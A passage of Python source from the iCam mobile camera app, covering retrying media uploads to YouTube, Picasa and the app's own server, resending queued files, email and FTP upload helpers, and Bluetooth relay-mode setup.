DebugPrint(errorStr)
DebugPrintErrorTrace()
return -1
return 0
"""
We declare it here, just before the function UploadStateAndFileAndStoreState()
which uses it, because we use it also in the 2 functions
MyFuncYouTubeVideoUpload() and MyFuncYouTubeVideoUpload(), inner to
UploadStateAndFileAndStoreState().
"""
googleRes = None
NUM_RETRIES_SEND_VIA_YOUTUBE = 2 #3
def UploadStateAndFileAndStoreState(aDeviceId, cameraId,
fileName, pathFileName,
inetServerAddress, pageOnServer, singleThreaded=False):
global googleRes
DebugPrint("Entered UploadStateAndFileAndStoreState() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
try:
crtTime = GetCurrentDateTime()
crtTime2 = GetTime()
# See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
# PetWatchdog()
"""
In case we upload media file to Google, BUT NOT to iCam server
(useiCamServer == 1, uploadMediaToYouTube = True,
uploadMediaToPicasa = True)
we still report in the state data the file size and the filename.
But we just don't send the media file - the server can easily
realize this.
"""
#if (useiCamServer == 1) or (fileName == NO_MEDIA_FILE_NAME):
if fileName == NO_MEDIA_FILE_NAME:
fileName2 = NO_MEDIA_FILE_NAME
else:
fileName2 = fileName
stateMarshalled = BuildState(cameraId, crtTime, numMilliseconds,
fileName2, pathFileName)
DebugPrint("UploadStateAndFileAndStoreState(): " \
"len(stateMarshalled) = %d." % len(stateMarshalled))
"""
stateStr = "%d %d %d %d %d %d " % (GetBatteryLevelPercentage(),
pauseInterval, burstModeIsStarted,
photoResolutionIndex, digitalZoom, photoQuality)
"""
# We can save the state at each invocation.
#res = StoreState(aDeviceId, stateMarshalled)
if fileName is None:
res = StoreState(aDeviceId, stateMarshalled)
return res
googleRes = 0
#######################################################################
#######################################################################
########### First, we upload the media to YouTube/Picasa. #############
#######################################################################
#######################################################################
if str.lower(fileName[len(fileName) - 4:]) in [".3gp", ".mp4"]:
# if serversUsed == 4:
if uploadMediaToYouTube:
def MyFuncYouTubeVideoUpload():
global googleRes
"""
googleRes = YouTubeVideoUpload(pathFileName, fileName,
googleKeywords, crtTime, None, None,
deviceId, cameraId)
"""
for i in range(NUM_RETRIES_SEND_VIA_YOUTUBE):
googleRes = YouTubeVideoUpload(pathFileName, fileName,
googleKeywords, crtTime, str(int(numMilliseconds)),
None, deviceId, cameraId,
int(GetBatteryLevelPercentage()),
int(GetChargerStatus()))
if googleRes == -1:
DebugPrint("MyFuncYouTubeVideoUpload(): " \
"YouTubeVideoUpload() returned %d." %
googleRes)
else:
break
# Do an "exponential backoff" time interval wait
SleepAndPetWatchdog( int(0.1 * (2**i)) )
else:
"""
Executed only if break was not used --> we have reached
this only if we failed NUM_RETRIES_SEND_VIA_YOUTUBE
times.
"""
DebugPrint("We failed NUM_RETRIES_SEND_VIA_YOUTUBE " \
"times --> we drop this media packet.")
"""
When using FileObjectBufferWithLenForGdataMedia() we do
not really require to use mediaUploadedLock.
In principle, the other thread, which can go back to
VideoRecordAndUpload() can proceed without waiting to
finish the upload, although this is not great since
YouTube puts a limit on the frequency of videos
uploaded on the established connection.
"""
if singleThreaded == False:
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock.signal()
if singleThreaded == True:
MyFuncYouTubeVideoUpload()
else:
# if storeLocallyMedia == 0:
# MyFuncYouTubeVideoUpload()
MyThreadStart(MyFuncYouTubeVideoUpload)
elif str.lower(fileName[len(fileName) - 4:]) in \
[".jpg", ".png", ".bmp"]:
# mediaFileData = ""
# if serversUsed == 4:
if uploadMediaToPicasa:
def MyFuncPicasaPhotoUpload():
global googleRes
# PicasaPhotoUpload(albumTitle, pathFileName, fileName)
# PicasaPhotoUpload(pathFileName, fileName, crtTime)
"""
googleRes = PicasaPhotoUpload(pathFileName, fileName,
googleKeywords, crtTime, None, None,
deviceId, cameraId)
"""
googleRes = PicasaPhotoUpload(pathFileName, fileName,
googleKeywords, crtTime, str(int(numMilliseconds)),
None, deviceId, cameraId)
if singleThreaded == False:
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock.signal()
if singleThreaded == True:
MyFuncPicasaPhotoUpload()
else:
# if storeLocallyMedia == 0:
# MyFuncPicasaPhotoUpload()
MyThreadStart(MyFuncPicasaPhotoUpload)
# mediaFileData = ""
if googleRes == -1:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# audio.say(u"I can't get no satisfaction")
audio.say(u"Error")
else:
pass
#######################################################################
#######################################################################
#######We uploaded (if requested) the media to YouTube/Picasa.#########
######## Now we prepare to upload media to the iCam server. ###########
#######################################################################
#######################################################################
mediaFileData = ""
# if serversUsed != 4:
#if uploadMediaToiCamServer:
if useiCamServer == 2:
if fileName == NO_MEDIA_FILE_NAME:
"""
We do not append to the SMF packet the media data:
mediaFileData == ""
"""
pass
else:
"""
if uploadMediaToYouTube and \
(str.lower(fileName[-4:]) in [".3gp", ".mp4"]):
pass
"""
# Read the binary file from disk.
try:
fInput = open(pathFileName, "rb")
mediaFileData = fInput.read()
fInput.close()
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
errorStr = "Exception in " \
"UploadStateAndFileAndStoreState() at %s " \
"with pathFileName = %s - details: " \
"free_ram = %d. " \
"exceptionTraceback = %s, " \
"exceptionType = %s, " \
"exceptionValue = %s. Bailing out..." \
% (
GetCurrentDateTimeStringNice(),
pathFileName,
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType),
str(exceptionValue)
)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(aDeviceId, errorStr,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint("Exception in " \
"UploadStateAndFileAndStoreState() at %s " \
"with pathFileName = %s. Bailing out..." % \
(GetCurrentDateTimeStringNice(),
pathFileName))
DebugPrintErrorTrace()
return -1
if ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ:
try:
os.unlink(pathFileName)
except:
# os.remove()
DebugPrintErrorTrace()
"""
UploadText("The JPEG has %d bytes." % len(data), ICAM_SERVER_NAME, \
WEBPAGE_UL_GZIPPED_TEXT)
"""
#data = message + STRING_SEPARATOR + filename + STRING_SEPARATOR + data
uploadData = stateMarshalled + mediaFileData
"""
UploadText("The uncompressed SMF has %d bytes." % len(data), \
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
"""
DebugPrint("UploadStateAndFileAndStoreState(): Sending data of " \
"size %d (accessPointName = %s, bluetoothMode = %d)." % \
(len(uploadData), accessPointName, bluetoothMode))
#return UploadGZippedData(data, ......, inetServerAddress,
# pageOnServer)
# if inetServerAddress is None:
myText = "UploadStateAndFileAndStoreState() - details: " \
"aDeviceId = %s, fileName = %s, pathFileName = %s, " \
"cameraId = %d, time = %s, free_ram = %d." % \
(
aDeviceId, fileName, pathFileName,
cameraId, GetCurrentDateTimeStringNice(),
GetFreeRAM()
)
DebugPrint(myText)
if MY_DEBUG_STDERR_2:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
# Normally, if no error, UploadGZippedData returns 0
res = 0
#if USE_ICAM_SERVER or bluetoothMode == 2:
if (useiCamServer > 0) or (bluetoothMode == 2):
res = UploadGZippedData(aDeviceId, uploadData, inetServerAddress,
pageOnServer, fileName)
if res == -1:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# audio.say(u"I can't get no satisfaction")
audio.say(u"Error")
return res
except:
DebugPrintErrorTrace()
"""
Used by BluetoothMessageProcessAndDelete(btMsgId) --> WE MUST NOT CHECK FOR
uploadUnsentData HERE, BUT IN THE caller of this function.
"""
def UploadUnsentBinaryData(aDeviceId, fileName, fileData):
global deviceId
try:
PetWatchdog()
myText = "UploadUnsentBinaryData(aDeviceId = %s, fileName = %s): at " \
"%s, calling InternetUploadBinaryData() with data of " \
"size %d." % (aDeviceId, fileName,
GetCurrentDateTimeStringNice(), len(fileData))
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
if NEW_BT_FORMAT:
if fileName[-4:] in BT_OBEX_EXTENSION_LIST_TXT:
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif fileName[-4:] in BT_OBEX_EXTENSION_LIST_SMF:
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif fileName[-4:] in BT_OBEX_EXTENSION_LIST_FIL:
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
else:
if fileName.endswith(EXTENSION_TEXT_MESSAGE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif fileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif fileName.endswith(EXTENSION_ARBITRARY_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
"""
if fileName.endswith(EXTENSION_TEXT_MESSAGE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif fileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif fileName.endswith(EXTENSION_ARBITRARY_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
res = InternetUploadBinaryData(fileData, ICAM_SERVER_NAME,
serverPageToConnectTo)
"""
UploadStateAndFileAndStoreState(aDeviceId, cameraId, fileName, pathFileName,
aYear, aMonth, aDay, aHour, aMinute, aSecond,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
if res == -1:
DebugPrint("UploadUnsentBinaryData(%s): unsuccessful " \
"InternetUploadBinaryData(). Returning..." % aDeviceId)
"""
!!!!!!!!I should save the unsent BT message for later resend(s).
fOutput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
"""
return
"""
if aDeviceId == deviceId:
DebugPrint("UploadUnsentBinaryData(%s): After successful " \
"InternetUploadBinaryData(), deleting temporary " \
"unsent file %s." % (aDeviceId, pathFileName))
os.unlink(pathFileName)
else:
DebugPrint("UploadUnsentBinaryData(%s) - relayed data: " \
"After successful InternetUploadBinaryData(), " \
"deleting unsent file %s - remember that we have " \
"the corresponding media file already saved in the " \
"Media folder." % (aDeviceId, pathFileName))
os.unlink(pathFileName)
"""
except:
#import shutil
#shutil.move(pathFileName, LOCAL_FOLDER_MEDIA_FILES + "/" + fileName)
DebugPrintErrorTrace()
def UploadUnsentFile(aDeviceId, pathFileName):
global deviceId
try:
PetWatchdog()
myText = "UploadUnsentFile(%s): at %s, calling " \
"InternetUploadBinaryData() with data from file %s of " \
"size %d bytes." % \
(aDeviceId, GetCurrentDateTimeStringWithMilliseconds(),
pathFileName, os.path.getsize(pathFileName))
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
#!!!!
if pathFileName.endswith(EXTENSION_COMMAND_MESSAGE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
"""
if pathFileName.endswith(EXTENSION_TEXT_MESSAGE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif pathFileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif pathFileName.endswith(EXTENSION_ARBITRARY_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
fInput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
"""
#To experiment burst of packets you can do a forever loop and send one
# unsent packet
while True:
"""
res = InternetUploadBinaryData(fileData, ICAM_SERVER_NAME,
serverPageToConnectTo)
"""
UploadStateAndFileAndStoreState(aDeviceId, cameraId,
fileName, pathFileName,
aYear, aMonth, aDay, aHour, aMinute, aSecond,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
if res == -1:
"""
DebugPrint("UploadUnsentFile(%s): unsuccessful " \
"InternetUploadBinaryData(). Returning..." % \
(aDeviceId))
return
"""
DebugPrint("UploadUnsentFile(%s): unsuccessful " \
"InternetUploadBinaryData(). " \
"InternetUploadBinaryData() saved to transmit later " \
"the data." % aDeviceId)
if aDeviceId == deviceId:
DebugPrint("UploadUnsentFile(%s): After successful " \
"InternetUploadBinaryData(), deleting temporary " \
"media file %s." % \
(aDeviceId, pathFileName))
os.unlink(pathFileName)
else:
DebugPrint("UploadUnsentFile(%s) - relayed data: After " \
"successful InternetUploadBinaryData(), deleting " \
".sfm file %s - remember that we have the " \
"corresponding media file already saved in the " \
"Media folder." % (aDeviceId, pathFileName))
os.unlink(pathFileName)
"""
newPathName = LOCAL_FOLDER_MEDIA_FILES + "/" + aDeviceId
newPathFileName = newPathName + "/" + fileName
DebugPrint("UploadUnsentFile(%s): After successful " \
"InternetUploadBinaryData(), moving file %s to %s - " \
"after unmarshalling the media file from it." % \
(aDeviceId, pathFileName, newPathFileName))
if not os.path.exists(newPathName):
os.makedirs(newPathName)
os.rename(pathFileName, newPathFileName)
"""
except:
#import shutil
#shutil.move(pathFileName, LOCAL_FOLDER_MEDIA_FILES + "/" + fileName)
DebugPrintErrorTrace()
def DoNotUploadUnsent():
global deviceId, conserveEnergy, uploadUnsentData
return (uploadUnsentData != 1 and uploadUnsentData != 3) or \
conserveEnergy or (deviceId == IMEI_N95)
def UploadUnsentFolder(aDeviceId, pathFolderName):
try:
DebugPrint("UploadUnsentFolder(%s): pathFolderName = %s." % \
(aDeviceId, pathFolderName))
folderContent = os.listdir(pathFolderName)
"""
# Use reverse = False to send first the oldest ones (like this you
# send in chronological order). Use reverse = True for sending
# first the most recent ones.
sortedFolderContent = sorted(folderContent, reverse = False)
"""
# sort() without parameters is the ONLY one that works in Python 2.2.
# (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
folderContent.sort()
sortedFolderContent = folderContent
counterUnsentPackets = 0
for fileName in sortedFolderContent:
#if True:
if fileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE) or \
fileName.endswith(EXTENSION_ARBITRARY_FILE):
# or if (fileName.endswith(EXTENSION_TEXT_MESSAGE):
if DoNotUploadUnsent():
DebugPrint("UploadUnsentFolder(): exiting " \
"UploadUnsentFolder() because " \
"conserveEnergy = %d or " \
"uploadUnsentData = %d or deviceId = %s." % \
(conserveEnergy, uploadUnsentData,
deviceId))
return
pathFileName = pathFolderName + "/" + fileName
"""
This should happen only when processing the Unsent folder
itself.
"""
if os.path.isdir(pathFileName):
pass
else:
UploadUnsentFile(aDeviceId, pathFileName)
if counterUnsentPackets % \
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS == \
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
hasDownloadedNewCmd = DownloadCommands()
counterUnsentPackets += 1
except:
DebugPrintErrorTrace()
def UploadUnsentFILES():
global deviceId, conserveEnergy, uploadUnsentData
if NoInternetConnection():
DebugPrint("UploadUnsentFILES(): NOT entering UploadUnsentFILES() " \
"because accessPointName = %s and " \
"accessPointRetryConnect = %d." % \
(accessPointName, accessPointRetryConnect))
return
if DoNotUploadUnsent():
DebugPrint("UploadUnsentFILES(): NOT entering UploadUnsentFILES() " \
"because conserveEnergy = %d or " \
"uploadUnsentData = %d or deviceId = %s." % \
(conserveEnergy, uploadUnsentData, deviceId))
return
else:
DebugPrint("UploadUnsentFILES(): Entering UploadUnsentFILES().")
"""
Attempting to send the unsent media files, as well, before sending the
current media file.
#UploadUnsentFILES()
"""
UploadUnsentFolder(deviceId, LOCAL_FOLDER_UNSENT_FILES)
# Process also the subfolders of Unsent, which are for the BT clients.
try:
folderContent = os.listdir(LOCAL_FOLDER_UNSENT_FILES)
for folderName in folderContent:
# if os.path.isdir(folderContent[i]):
folderPathName = LOCAL_FOLDER_UNSENT_FILES + "/" + folderName
DebugPrint("UploadUnsentFILES(): folderPathName = %s." % \
folderPathName)
if os.path.isdir(folderPathName):
# folderContent[i] is the aDeviceId
UploadUnsentFolder(folderName, folderPathName)
except:
DebugPrintErrorTrace()
try:
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
except:
DebugPrint("Cannot import modules smtplib and email.*")
DebugPrintErrorTrace()
def UploadByEmailAttachement(sender, recipients, mediaPathFileName):
# Inspired from http://docs.python.org/2/library/email-examples.html
global googleUsername, googlePassword
DebugPrint("Entered UploadByEmailAttachement()")
if False:
DebugPrint(" UploadByEmailAttachement(): googleUsername=%s, " \
"googlePassword = %s" % (googleUsername, googlePassword))
try:
# From http://stackoverflow.com/questions/3362600/how-to-send-email-attachments-with-python/3362673#3362673
send_to = recipients
msg = MIMEMultipart()
msg["From"] = sender
#msg["To"] = COMMASPACE.join(send_to)
msg["To"] = ", ".join(send_to)
msg["Date"] = formatdate(localtime=True)
#msg["Subject"] = subject
msg["Subject"] = "Our family reunion2 from Android"
text = "This is a test email with attachement"
msg.attach( MIMEText(text) )
part = MIMEBase("application", "octet-stream")
part.set_payload( open(mediaPathFileName, "rb").read() )
Encoders.encode_base64(part)
part.add_header(
"Content-Disposition",
'attachment; filename="%s"' % os.path.basename(mediaPathFileName))
msg.attach(part)
#print "msg.as_string() =", msg.as_string()
server = smtplib.SMTP("smtp.gmail.com:587")
# The server.ehlo() are very important for GMail - otherwise, it doesn't work
server.ehlo()
server.starttls()
server.ehlo() # From http://stackoverflow.com/questions/12030179/issue-sending-email-with-python
server.login(googleUsername, googlePassword)
server.sendmail(sender, recipients, msg.as_string())
#server.quit()
server.close()
#print "Successfully sent the mail to smtp.gmail.com"
except:
DebugPrintErrorTrace()
try:
import ftplib
except:
DebugPrint("Cannot import module ftplib.")
DebugPrintErrorTrace()
def UploadByFTP(mediaPathFileName):
# Inspired from [Beazley_2009], Chapter 22
ftpURL = ""
ftpUsername = ""
ftpPassword = ""
ftpConnection = ftplib.FTP(ftpURL, ftpUsername, ftpPassword)
fInput = open(mediaPathFileName, "rb")
# Send file to the FTP server
res = ftpConnection.storbinary("STOR " + mediaPathFileName, fInput)
# Close the connection
ftpConnection.close()
#UploadByFTP(mediaPathFileName="./vlc-help_std.txt")
def StoreConfig_CamAutoCfg_WinCE():
DebugPrint("Entered StoreConfig_CamAutoCfg_WinCE().")
try:
fOutput = open(LOCAL_FOLDER + "/CamAuto.cfg", "wb")
fOutput.write("%d %d" % (videoRecordDuration[0],
pauseInterval))
fOutput.close()
except:
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############################################################################
###############################################################################
##############################Bluetooth########################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
bluetoothModeList = [u"Bluetooth not used",
u"Bluetooth server and Internet proxy mode",
u"Bluetooth client mode"] # u"No Bluetooth",
# basestation
# This var is required as global.
bluetoothFormSaved = False
bluetoothInbox = None
# Uses a Form
def SelectBluetoothMode():
global bluetoothMode, bluetoothServerAddress
global bluetoothFormSaved, useiCamServer
global uploadMediaToYouTube, uploadMediaToPicasa
"""
Note that myFields contains a combo with values
frombluetoothModeList, from which we choose the initial value
the one of index bluetoothMode.
"""
myFields = [(u"Bluetooth mode for iCam Phone", "combo",
(bluetoothModeList, bluetoothMode))]
if ANDROID_OS:
"""
DisplayNote("Bluetooth functionality not YET implemented for iCam " \
"for Android!")
"""
try:
bluetoothMode = DialogMultipleChoices(myFields[0][0], \
bluetoothModeList[0:2], int(bluetoothMode))
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS:
"""
From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
(and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
"""
if bluetoothMode == -1:
"""
bluetoothMode is used as default value index in combo in myFields
and it has to be >= 0 and < len(bluetoothModeList)
"""
bluetoothMode = 0
try:
# Initialize a boolean variable to know whether the form is saved
bluetoothFormSaved = False
appuifw.app.title = u"Bluetooth Intranet"
# Creates the form
#bluetoothForm = appuifw.Form(myFields,
# flags=appuifw.FFormEditModeOnly)
bluetoothForm = appuifw.Form(myFields, \
flags=appuifw.FFormEditModeOnly | appuifw.FFormDoubleSpaced)
"""
popupMenuList = []
for i in range(len(bluetoothModeList)):
if i == bluetoothMode:
popupMenuList += [unicode(MENU_SELECT_PREFIX
+ bluetoothModeList[i])]
else:
popupMenuList += [unicode(bluetoothModeList[i])]
resMenu = appuifw.popup_menu(popupMenuList,
u"Select phone Bluetooth mode for iCam")
"""
# bluetoothForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
# Define a function to be called when the form is saved
def BluetoothFormSaved(arg):
global bluetoothFormSaved
bluetoothFormSaved = True
return True
# Assign the save function
bluetoothForm.save_hook = BluetoothFormSaved
# Show the form. This operation is blocking until we close the form.
bluetoothForm.execute()
# After the form is saved and closed, display the information
if bluetoothFormSaved == True:
# print bluetoothForm[0][2]
"""
The combo form field value is a long integer. We convert it to
int because we would receive "TypeError: Form combo field,
bad index" at the next instantiation of appuifw.Form().
"""
bluetoothMode = int(bluetoothForm[0][2][1])
# StoreState()
if bluetoothMode == 0:
bluetoothServerAddress = "no_BT"
StoreState()
elif bluetoothMode == 1:
bluetoothServerAddress = "BTServer"
StoreState()
# Spawn a "thread":
# global bluetoothServerTimer
# bluetoothServerTimer.after(1, BluetoothServer)
DebugPrint("SelectBluetoothMode(): Calling " \
"BluetoothServerInitialize().")
"""
from threading import Thread
bluetoothServerThread = Thread(target = BluetoothServer)
bluetoothServerThread.start()
#time.sleep(1)
"""
"""
BluetoothServerInitialize()
time.sleep(2)
"""
# """
"""
Does not work on PyS60 1.4.5 - see Weekly snippets
Aug 1st, 2010
"""
# thread.start_new_thread(BluetoothServer, ())
BluetoothServerInitialize()
"""
This might take a long time to complete, if there are
many BT messages in Inbox.
"""
BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
elif bluetoothMode == 2:
# This is BT client mode.
# time.sleep(1)
# e32.ao_sleep(1)
# """
"""
To send the media file in the BT message we need to have
useiCamServer = 2. Otherwise, we send only the state.
"""
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
"""
We want to ask (in next BluetoothClientDiscoverServer()
call) for the server in SelectBluetoothMode().
"""
bluetoothServerAddress = ""
BluetoothClientDiscoverServer()
BluetoothClientInitializeInbox()
StoreState()
BluetoothMessageListProcess(processJustNonSMF_BtMsgs=True)
except:
DebugPrintErrorTrace()
"""
finally: # Doesn't work in Python 2.2 (e.g., PyS60 1.4.5)
appuifw.app.title = ICAM_APP_TITLE
"""
appuifw.app.title = ICAM_APP_TITLE
bluetoothUploadErrorsCounter = 0
NUM_RETRIES_SEND_VIA_BT = 3
def BluetoothUploadBinaryData(bluetoothRecipientAddress, aData, fileName):
global bluetoothServerOPPServicePort
global deviceId
global bluetoothUploadErrorsCounter
"""
DebugPrint("Entered BluetoothUploadBinaryData(" \
"bluetoothRecipientAddress = %s, fileName = %s, " \
"len(aData) = %d, aData = %s)." % \
(bluetoothRecipientAddress, fileName, len(aData), aData))
"""
DebugPrint("Entered BluetoothUploadBinaryData(" \
"bluetoothRecipientAddress = %s, fileName = %s, " \
"len(aData) = %d)." % \
(bluetoothRecipientAddress, fileName, len(aData)))
try:
"""
fileName is the name of the file to be sent via BT:
- COMMANDS_FILENAME
- with extension .fil
- media file with extension: ".jpg", ".png", ".3gp", ".mp4".
if fileName == None --> message is TXT BT message.
"""
if fileName != None:
# CMD type
if fileName == COMMANDS_FILENAME:
if NEW_BT_FORMAT:
btFileName = BT_OBEX_FILENAME_PREFIX + \
GetCurrentDateTimeStringWithMilliseconds() + \
"_" + deviceId + "_x" + \
BT_OBEX_EXTENSION_CMD #EXTENSION_COMMAND_MESSAGE
tmpPathFileName = LOCAL_FOLDER + "/" + btFileName
#unsentFileName = btFileName + "." + COMMANDS_FILENAME
unsentFileName = btFileName
else:
# time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
btFileName = BT_OBEX_FILENAME_PREFIX + \
BT_OBEX_FILENAME_PREFIX_TYPE_CMD + \
GetCurrentDateTimeStringWithMilliseconds()
unsentFileName = btFileName + "." + COMMANDS_FILENAME
tmpPathFileName = LOCAL_FOLDER + "/" + btFileName
# FIL type
elif str.lower(fileName).endswith(EXTENSION_ARBITRARY_FILE):
# elif fileName.endswith(EXTENSION_ARBITRARY_FILE):
if NEW_BT_FORMAT:
btFileName = BT_OBEX_FILENAME_PREFIX + \
GetCurrentDateTimeStringWithMilliseconds() + \
"_" + deviceId + "_x" + \
EXTENSION_ARBITRARY_FILE
else:
btFileName = BT_OBEX_FILENAME_PREFIX + \
BT_OBEX_FILENAME_PREFIX_TYPE_FIL + \
GetCurrentDateTimeStringWithMilliseconds()
unsentFileName = btFileName + EXTENSION_ARBITRARY_FILE
tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + btFileName
# SMF type
#elif str.lower(fileName[-4:]) in [".jpg", ".png", ".3gp", ".mp4"]:
elif str.lower(fileName[-4:]) in BT_OBEX_EXTENSION_LIST_SMF:
# iCam_jpg_2010_10_31_...
# tmpPathFileName will look like iCam_SMF_jpg_2010_10_31_...
"""
We assume this is a SMF file (the filename can be .jpg, .3gp,
.mp4, etc). We should check this NOT ASSUME IT!!!!
"""
#tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
# BT_OBEX_FILENAME_PREFIX + fileName
LEN_EXT_FILENAME = 3
"""
tmpPathFileName = LOCAL_FOLDER + "/" + \
BT_OBEX_FILENAME_PREFIX + fileName[len(fileName) -
LEN_EXT_FILENAME : LEN_EXT_FILENAME] + "+" +
fileName[0 : len(fileName) - (LEN_EXT_FILENAME + 1)]
"""
if NEW_BT_FORMAT:
# fileName[len(fileName) - LEN_EXT_FILENAME :]
#btFileName = fileName[:-4] + "_bt" + fileName[-4:]
btFileName = BT_OBEX_FILENAME_PREFIX + \
fileName[:len(fileName) - 4] + \
fileName[len(fileName) - 4:]
else:
"""
# time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
btFileName = BT_OBEX_FILENAME_PREFIX + \
BT_OBEX_FILENAME_PREFIX_TYPE_TXT + \
GetCurrentDateTimeStringWithMilliseconds()
# time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
btFileName = BT_OBEX_FILENAME_PREFIX + \
BT_OBEX_FILENAME_PREFIX_TYPE_SMF + \
fileName[len(fileName) - 3 : ] + \
GetCurrentDateTimeStringWithMilliseconds()
"""
btFileName = BT_OBEX_FILENAME_PREFIX + \
BT_OBEX_FILENAME_PREFIX_TYPE_SMF + \
fileName[len(fileName) - LEN_EXT_FILENAME:] + \
"_" + fileName[0: len(fileName) - \
(LEN_EXT_FILENAME + 1)]
# btFileName + EXTENSION_STATE_AND_MEDIA_FILE
unsentFileName = btFileName
# unsentFileName = btFileName + EXTENSION_STATE_AND_MEDIA_FILE
tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
btFileName
DebugPrint("BluetoothUploadBinaryData(): btFileName = %s." % \
btFileName)
"""
We want to have the media file at the beginning of aData and
the state at the end, but UploadStateAndFileAndStoreState()
puts them in reversed order.
"""
if NEW_BT_FORMAT:
if fileName == COMMANDS_FILENAME:
pass
else:
myOffset = struct.calcsize(statePackFormat)
aData = aData[myOffset:] + aData[0 : myOffset]
# Unknown type
else:
DebugPrint("BluetoothUploadBinaryData(): fileName has " \
"unknown extension.")
else:
"""
TEXT message (else for "if fileName != None:" above)
Note that here we create the BT message name.
"""
if NEW_BT_FORMAT:
btFileName = BT_OBEX_FILENAME_PREFIX + \
GetCurrentDateTimeStringWithMilliseconds() + \
"_" + deviceId + "_x" + \
BT_OBEX_EXTENSION_TXT #EXTENSION_TEXT_MESSAGE
unsentFileName = btFileName
else:
btFileName = BT_OBEX_FILENAME_PREFIX + \
BT_OBEX_FILENAME_PREFIX_TYPE_TXT + \
GetCurrentDateTimeStringWithMilliseconds()
# time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
unsentFileName = btFileName + EXTENSION_TEXT_MESSAGE
"""
tmpPathFileName = LOCAL_FOLDER + "/" + BT_OBEX_FILENAME_PREFIX + \
time.strftime(BT_OBEX_FILENAME_PREFIX_TYPE_TXT +
"%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
"""
tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + btFileName
if WINDOWS_OS:
"""
This is just for testing purposes - we do not send via
BT, but put the file in the virtual "recipient" BT inbox folder
"""
#tmpPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
tmpPathFileName = BLUETOOTH_INBOX_PATH + "/" + btFileName
DebugPrint("BluetoothUploadBinaryData(): tmpPathFileName = %s, " \
"unsentFileName = %s" % (tmpPathFileName, unsentFileName))
if NEW_BT_FORMAT:
aDataBT = aData
else:
"""
We add header word with the length of the BT msg (except this word).
Note that this length dword is added at the
beginning of the Bluetooth transmission packet, but is not
added for the Internet transmission.
"""
"""
IMPORTANT: We require < to specify little endian and ALSO no
alignment (see http://docs.python.org/library/struct.html)
"""
aDataBT = struct.pack("<i", len(aData)) + aData
"""
The name of the file sent is like sLog_2010_10_29_12_56_17_0.jpg or
sLog_2010_10_29_12_53_33_1.3gp, although the file is not a .jpg or
.3gp because it contains extra data at the beginning and the
resulting data is gzipped.
"""
fOutput = open(tmpPathFileName, "wb")
fOutput.write(aDataBT)
